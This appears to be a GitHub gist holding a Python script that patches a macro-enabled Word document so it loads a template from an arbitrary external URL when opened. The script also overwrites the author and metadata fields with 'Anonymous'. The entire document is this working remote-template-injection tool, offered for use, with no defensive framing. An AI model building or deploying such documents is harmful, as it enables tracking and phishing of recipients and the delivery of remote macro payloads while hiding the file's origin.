Skip to content

Instantly share code, notes, and snippets.

@akkuman
Created November 20, 2020 07:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
docm远程加载url探针
import os
import uuid
import shutil
import zipfile
import lxml.etree
def inplace_change(filename, old_string, new_string, encoding='utf-8'):
    """Replace every occurrence of a substring inside a text file, in place.

    The file is read and written with an explicit encoding (UTF-8 by default)
    instead of the platform locale, and newline translation is disabled so
    the original line endings are written back unchanged.

    Args:
        filename: Path of the file to edit.
        old_string: Text to search for.
        new_string: Text substituted for each occurrence of ``old_string``.
        encoding: Text encoding used for both reading and writing.

    Returns:
        None. The file is not rewritten when ``old_string`` does not occur.
    """
    # newline='' keeps "\r\n" / "\n" exactly as stored on disk.
    with open(filename, encoding=encoding, newline='') as f:
        content = f.read()
    if old_string not in content:
        return
    with open(filename, 'w', encoding=encoding, newline='') as f:
        f.write(content.replace(old_string, new_string))
def zip_folder(dirpath, zippath):
    """Pack every file below a directory into a zip archive.

    Entries are stored under their path relative to ``dirpath`` so the archive
    has the same layout as the directory, and they are deflate-compressed.
    The archive itself is skipped when ``zippath`` lies inside ``dirpath``.

    Args:
        dirpath: Directory whose files are packed.
        zippath: Path of the zip file to create.
    """
    archive_abspath = os.path.abspath(zippath)
    with zipfile.ZipFile(zippath, 'w', compression=zipfile.ZIP_DEFLATED) as zip_handler:
        for root, _dirs, files in os.walk(dirpath):
            for file in files:
                abspath = os.path.join(root, file)
                # Never add the archive that is currently being written.
                if os.path.abspath(abspath) == archive_abspath:
                    continue
                # A relative arcname keeps the directory hierarchy inside the zip.
                relpath = os.path.relpath(abspath, dirpath)
                zip_handler.write(abspath, relpath)
def docpatch(document_path: str, url: str, tempdir: str) -> str:
    """Patch a docm file so that it references a remote template URL.

    The document is unpacked into a uniquely named scratch directory below
    ``tempdir``. ``word/settings.xml`` receives an ``attachedTemplate``
    element, ``word/_rels/settings.xml.rels`` is (over)written with an
    external relationship pointing at ``url``, selected metadata fields in
    ``docProps/core.xml`` are overwritten, and the tree is zipped back into a
    new file. The scratch directory is removed on success and on failure.

    Args:
        document_path: Path of the docm file to patch.
        url: URL to load; it is XML-escaped before being written, so pass it
            unescaped.
        tempdir: Directory that holds the scratch folder and the result file.

    Returns:
        Path of the patched document, named ``<uuid><original suffix>`` and
        located in ``tempdir``.

    Raises:
        Exception: Any error raised while unpacking ``document_path`` is
            re-raised after the diagnostic message has been printed.

    References:
        - https://github.com/chrismaddalena/DocPatch
    """
    # Local import: keeps this function self-contained without touching the
    # file-level import block.
    from xml.sax.saxutils import quoteattr

    uid_name = str(uuid.uuid4())
    _tempdir = os.path.join(tempdir, uid_name)
    core_xml_loc = os.path.join(_tempdir, 'docProps', 'core.xml')
    settings_file_loc = os.path.join(_tempdir, 'word', 'settings.xml')
    theme_file_loc = os.path.join(_tempdir, 'word', '_rels', 'settings.xml.rels')
    # quoteattr() escapes &, <, > and quotes and adds the surrounding quotes,
    # so a URL with a query string cannot produce malformed XML.
    themes_value = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        f'Target={quoteattr(url)} TargetMode="External"/></Relationships>'
    )

    # Create the scratch directory.
    os.makedirs(_tempdir, exist_ok=True)
    try:
        # Unpack the document so its XML parts can be edited.
        try:
            with zipfile.ZipFile(document_path, 'r') as zip_handler:
                zip_handler.extractall(_tempdir)
        except Exception as e:
            print("[!] Oops! The document could not be unzipped. Are you sure it's a valid macro-enabled Word document?")
            print(f"L.. Details: {str(e)}")
            # Nothing usable was extracted; continuing would only fail later
            # with a less helpful error.
            raise

        # Reference relationship rId1 from settings.xml and define it in
        # settings.xml.rels (any existing rels file is replaced).
        inplace_change(settings_file_loc, '</w:settings>', '<w:attachedTemplate r:id="rId1"/></w:settings>')
        os.makedirs(os.path.dirname(theme_file_loc), exist_ok=True)
        # The payload declares UTF-8, so write it as UTF-8 regardless of locale.
        with open(theme_file_loc, 'w', encoding='utf-8') as fh:
            fh.write(themes_value)

        # Rewrite the metadata stored in docProps/core.xml.
        namespaces = {
            'dc': 'http://purl.org/dc/elements/1.1/',
            'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties',
        }
        # Name written into the creator / last-modified-by fields.
        user_name = "Anonymous"
        replacements = (
            ('//dc:creator', user_name),
            ('//cp:lastModifiedBy', user_name),
            ('//cp:keywords', "None"),
            ('//dc:description', "None"),
        )
        root = lxml.etree.parse(core_xml_loc)
        for xpath, text in replacements:
            matches = root.xpath(xpath, namespaces=namespaces)
            # Only the first match is updated; absent fields are left absent.
            if matches:
                matches[0].text = text

        # Write the updated core.xml back with an explicit XML declaration.
        with open(core_xml_loc, 'wb') as fh:
            fh.write(b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n')
            fh.write(lxml.etree.tostring(root))

        # Repack the edited tree under the original file extension.
        suffix = os.path.splitext(document_path)[1]
        result_filename = f'{uid_name}{suffix}'
        result_filepath = os.path.join(tempdir, result_filename)
        zip_folder(_tempdir, result_filepath)
    finally:
        # Always remove the scratch directory; ignore_errors keeps a cleanup
        # problem from masking the exception that is already propagating.
        shutil.rmtree(_tempdir, ignore_errors=True)
    return result_filepath
if __name__ == "__main__":
    import sys

    # Exactly two arguments are expected: the docm file and the URL to load.
    if len(sys.argv) != 3:
        print(f'python {sys.argv[0]} docm文件 加载的url')
        sys.exit(1)

    _script, document_arg, url = sys.argv
    docpath = os.path.abspath(document_arg)
    # The patched copy is written into the same directory as the input file.
    tempdir = os.path.dirname(docpath)
    print(docpatch(docpath, url, tempdir))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment